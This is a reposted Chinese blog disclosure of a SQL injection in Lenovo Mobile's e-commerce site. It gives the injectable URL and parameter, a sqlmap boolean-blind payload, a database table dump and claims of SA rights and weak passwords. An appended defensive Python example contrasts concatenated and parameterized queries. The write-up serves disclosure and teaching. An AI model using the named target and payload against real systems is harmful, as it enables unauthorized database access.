好得很 (Haodehen) Programmer Self-Study Site


Lenovo Mobile E-Commerce System: SA Injection and Fix - Website Security

1. This is the site, the Lenovo Mobile e-commerce system, which looks pretty impressive: http://ec.lenovomobile.com/

2. It can be injected here: http://ec.lenovomobile.com/WebForm/Other/Other_download/Other_DownLoad_ListInfo.aspx?List_Name=联想移动合作银行

3. It runs as SA:

4. It can reach across multiple databases:

5. Weak passwords on several database accounts:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: List_Name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: List_Name=联想移动合作银行' AND 6011=6011 AND 'HHoo'='HHoo
---

6. Looking at the tables in the current database [LMECOTHER]: someone had already been here before this and left behind the temporary tables of D99 and pangolin:

Database: LMECOTHER
[38 tables]
+--------------------------------------------------+
| dbo.D99_CMD                                      |
| dbo.D99_Tmp                                      |
| dbo.Other_Address_List                           |
| dbo.Other_Address_Org                            |
| dbo.Other_BBS_Forum                              |
| dbo.Other_BBS_ForumGroups                        |
| dbo.Other_BBS_Posts                              |
| dbo.Other_BBS_RePosts                            |
| dbo.Other_BBS_Users                              |
| dbo.Other_ClickStat                              |
| dbo.Other_CusLine                                |
| dbo.Other_CusLine_Type                           |
| dbo.Other_DownLoad_KnowLedge_Type                |
| dbo.Other_DownLoad_List                          |
| dbo.Other_DownLoad_List_Type                     |
| dbo.Other_DownLoad_Pic                           |
| dbo.Other_DownLoad_Tools                         |
| dbo.Other_DownLoad_knowledge                     |
| dbo.Other_Link                                   |
| dbo.Other_Rule                                   |
| dbo.Other_Survey                                 |
| dbo.Other_Survey_Item                            |
| dbo.Other_Survey_Result                          |
| dbo.View_Forum                                   |
| dbo.View_PostList                                |
| dbo.dtproperties                                 |
| dbo.kill_kk                                      |
| dbo.other_CustMailInfo                           |
| dbo.other_CustMailView                           |
| dbo.other_Notice                                 |
| dbo.other_Notice_New                             |
| dbo.other_Notification                           |
| dbo.other_NotificationObj                        |
| dbo.other_NotificationObj_New                    |
| dbo.other_Notification_New                       |
| dbo.pangolin_test_table                          |
| dbo.sysconstraints                               |
| dbo.syssegments                                  |
+--------------------------------------------------+

Fix: send a gift, what else is there to do!

Copyright notice: please credit the source when reposting. 风萧萧
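An added example, not part of the original report: the List_Name lookup written with string concatenation next to a parameterized version, plus a check that reproduces the true/false difference that sqlmap's boolean-based blind test relies on. Python's sqlite3 stands in for SQL Server here, and the column names and function names are assumptions.

```python
import sqlite3

# Constructed stand-in data: sqlite3 replaces SQL Server, and the column
# names (List_Name, Title) are assumptions. Only the table name and the
# List_Name request parameter come from the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Other_DownLoad_List (List_Name TEXT, Title TEXT)")
    db.executemany(
        "INSERT INTO Other_DownLoad_List VALUES (?, ?)",
        [("联想移动合作银行", "bank list 1"), ("other", "misc")],
    )
    return db


def list_info_concat(db, list_name):
    """Vulnerable pattern: the request value is pasted into the SQL text."""
    sql = ("SELECT Title FROM Other_DownLoad_List "
           "WHERE List_Name = '" + list_name + "'")
    return db.execute(sql).fetchall()


def list_info_param(db, list_name):
    """Hardened pattern: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT Title FROM Other_DownLoad_List WHERE List_Name = ?"
    return db.execute(sql, (list_name,)).fetchall()


def is_boolean_oracle(query, db, base):
    """True if an appended true vs. false condition changes the result set,
    which is the signal a boolean-based blind test depends on."""
    true_rows = query(db, base + "' AND 6011=6011 AND 'HHoo'='HHoo")
    false_rows = query(db, base + "' AND 6011=6012 AND 'HHoo'='HHoo")
    return true_rows != false_rows


if __name__ == "__main__":
    db = make_db()
    name = "联想移动合作银行"
    print("concatenated query leaks a true/false signal:",
          is_boolean_oracle(list_info_concat, db, name))
    print("parameterized query leaks a true/false signal:",
          is_boolean_oracle(list_info_param, db, name))
    print("legitimate lookup still works:", list_info_param(db, name))
```

Parameterizing the query closes the injection point; the application connecting as SA is a separate privilege problem that this example does not address.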
